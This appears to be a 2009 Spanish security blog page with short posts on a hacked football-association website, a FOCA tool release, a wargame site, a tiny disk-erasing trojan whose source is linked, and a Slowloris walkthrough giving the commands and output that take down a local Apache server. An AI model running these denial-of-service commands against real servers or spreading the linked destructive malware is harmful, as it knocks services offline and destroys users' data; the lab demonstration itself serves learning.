Un lugar sin fin

General

Aquí no se salva ni D10s!

Escrito por unlugarsinfin 13-09-2009 en General. Comentarios (0)

Desde este domingo, cualquiera que intente conectarse a la página web oficial de la AFA, se encontrará con el siguiente mensaje:

 

http://unlugarsinfin.blogspot.es/img/AFA.jpg

 

Y es que un grupo de intrusos informáticos identificados como 'KKR' subió a la página web de la Asociación del Fútbol Argentino (AFA) una fotografía del seleccionador Diego Maradona con la camiseta de Brasil.

http://unlugarsinfin.blogspot.es/img/maradona.jpg

 

Debajo del título 'Hacked by KKR' y de la foto de Maradona se lee "una imagen vale más que mil palabras...", lo cual bloquea la entrada a la página de la entidad AFA (mirror en Zone-H).

 

Los 'hackers' de KKR han bloqueado en los últimos tiempos, entre otras, la página del gobierno de la ciudad de Buenos Aires y de empresas multinacionales.

Maradona es blanco de duras críticas esta semana tras las derrotas de la selección argentina ante Brasil y Paraguay, que le han dejado en zona de repesca en las eliminatorias sudamericanas del Mundial 2010.

 

Fuente: Marca

 

 

FOCA Release Candidate 1

Escrito por unlugarsinfin 11-09-2009 en General. Comentarios (0)

Amigos de la FOCA, amigos todos.. llega la RC1:

 


De: Amigos De la Foca <amigosdelafoca@Informatica64.com>
Para: "micuenta@micuenta.ya" < micuenta@micuenta.ya >
Enviado: jueves, 10 de septiembre, 2009 19:35:58
Asunto: FOCA Release Candidate 1 has been published

FOCA Release Candidate 1 has been published

We are proud to announce that FOCA RC1 has been published. This new version has a lot of features you have asked for. In a short list:

-          [+]Proxy supported

-          [+]Added alternative domains

-          [+]Search of IP address of servers in domains and alternative domains

-          [+]Added scan IP range to search IP resolutions

-          [+]Used Robtex to resolve IPs

-          [+]Showed individual ACL in servers

-          [+]Export Servers list

-          [~]Better representation of network analysis

-          [~]Improved used documents search

-          [*]Fix error in bing search

You can download the new version from http://www.informatica64.com/FOCA. Please, send us your suggestions for improve, new ideas or bugs to be fixed to amigosdelafoca@informatica64.com. Also you can download OOMetaExtractor to clean OpenOffice documents from http://www.codeplex.com/OOMetaextrator and try Metashield Protector to clean documents published in your website from http://www.metashieldprotector.com

Informatica64

 

 

Jugando con Yashira

Escrito por unlugarsinfin 10-09-2009 en General. Comentarios (0)

Como ya sabemos, los Wargames & Challenges son websites donde existen pruebas especiales para que practiques tus habilidades y tu pericia, no solo en hacking, sino en cracking, programacion, cifrado, etc...

 

En esta ocasión os presento a http://www.yashira.org/, que ha iniciado el año 2009 con 10 nuevos retos en 6 diferentes categorías con diferentes niveles de dificultad (para que así todos puedan participar).

De lo destacado de esta nueva entrega es una nueva saga traída de la mano de g30rg3_x llamada "Sniffing" que vendrá a satisfacer la necesidad de aquellas personas quienes gustan de este arte o simplemente les gustan los retos de seguridad informática (hacking) en Yashira.

 

 

http://unlugarsinfin.blogspot.es/img/Yashira.jpg

 

 

 

El tamaño no importa, ¿o sí? ;-)

Escrito por unlugarsinfin 07-09-2009 en General. Comentarios (0)

Dicen que las cosas pequeñas de la vida son las más importantes. Leyendo los premios concedidos por Kapersky a lo mejor del malware en 2007, llama la atención que el código malicioso de menor tamaño hace lo mismo que el de mayor tamaño: borrar en el disco.

 

Este pequeño malware, de tan sólo 9 bytes, no es otro que Trojan.DOS.DiskEraser.b, y su código en ensamblador puede obtenerse aquí.

 

Otro repositorio de código fuente malicioso, y quizás uno de los más famosos es http://www.totallygeek.com/vscdb/, y existen muchos más, ¿cuál es vuestro ‘bicho’ favorito?

 

 http://unlugarsinfin.blogspot.es/img/sandia.jpg

Probando DoS con Slowloris

Escrito por unlugarsinfin 28-08-2009 en General. Comentarios (0)

Slowloris, traducido al castellano como ‘loris perezoso’, ya no es sólo ese animalito que parece un oso de peluche y que da ganas de abrazarlo, también es un script en Perl que causa DoS en algunos tipos de servidores web.

 

Podéis encontrarlo en http://ha.ckers.org/slowloris/ e incluso en la Wikipedia :-):

 

Slow loris

From Wikipedia, the free encyclopedia

For the denial of service attack, see Slowloris.

 

The slow loris is any one of three species of loris classified in the genus Nycticebus. These slow moving….

 

 

El script se basa en la cantidad de peticiones que es capaz de mantener un servidor web de forma concurrente.

 

Lo que hace es saturar el pool de servicios mediante la creación de peticiones HTTP (incluido HTTPS) de manera que empieza a enviar cabeceras y más cabeceras al servidor forzándole a mantener abiertas las conexiones. Los servidores web tienen determinado un número máximo global de sockets permitidos (configurados en los ficheros correspondientes), si este número se sobrepasa el servicio web deja de responder.

 

Para comprobarlo, ejecutamos el script contra un servidor Apache 2.x de forma local.

 

Primero descargamos el susodicho script y echamos un vistazo al perldoc. En él nos indican que podemos empezar probando cual sería el mejor timeout para servidor:

 

 

# perl slowloris.pl -dns localhost -test -port 80

 

http://unlugarsinfin.blogspot.es/img/slowloris.jpg 

 

Defaulting to a 5 second tcp connection timeout.

Multithreading enabled.                              

This test could take up to 14.3666666666667 minutes.

Connection successful, now comes the waiting game...

Trying a 2 second delay:

    Worked.

Trying a 30 second delay:

    Worked.

Trying a 90 second delay:

    Worked.

Trying a 240 second delay:

    Worked.

Trying a 500 second delay:

    Worked.

Remote server closed socket.

Use 500 seconds for -timeout.

 

 

 

Bien, ya tenemos el timeout. Ahora sólo queda lanzar el ataque :

 

 

 

# perl slowloris.pl -dns localhost -port 80 -timeout 500 -num 5000 -tcpto 5

 

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client

Multithreading enabled.
Connecting to localhost:80 every 500 seconds with 5000 sockets:
        Building sockets.
        Sending data.
Current stats:    Slowloris has now sent 250 packets successfully.
This thread now sleeping for 500 seconds...

        Building sockets.
        Building sockets.
        Sending data.
Current stats:    Slowloris has now sent 635 packets successfully.
This thread now sleeping for 500 seconds...

        Building sockets.
        Sending data.
Current stats:    Slowloris has now sent 776 packets successfully.
This thread now sleeping for 500 seconds...

        Building sockets.
        Building sockets.
        Building sockets.
        Building sockets.
        Building sockets.
        Building sockets.
        Building sockets.
….
       
Building sockets.

 

Sending data.
Current stats:    Slowloris has now sent 1098 packets successfully.
This thread now sleeping for 500 seconds...

        Sending data.
Current stats:    Slowloris has now sent 1348 packets successfully.
This thread now sleeping for 500 seconds...

        Sending data.
Current stats:    Slowloris has now sent 1645 packets successfully.
This thread now sleeping for 500 seconds...

        Sending data.
Current stats:    Slowloris has now sent 1831 packets successfully.
This thread now sleeping for 500 seconds...

        Sending data.
Current stats:    Slowloris has now sent 1842 packets successfully.
This thread now sleeping for 500 seconds...

 

 

Y comprobar que nuestro servidor web efectivamente ha caído:

 

  

http://unlugarsinfin.blogspot.es/img/slowloris2.jpg

 

 

 

Y por último, echamos un vistazo al error.log del servidor web Apache:

 

[Fri Aug 28 13:33:43 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:43:51 2009] [error] server reached MaxClients setting, consider raising the MaxClients setting
[Fri Aug 28 13:48:47 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:48:47 2009] [error] [client 127.0.0.1] request failed: error reading the headers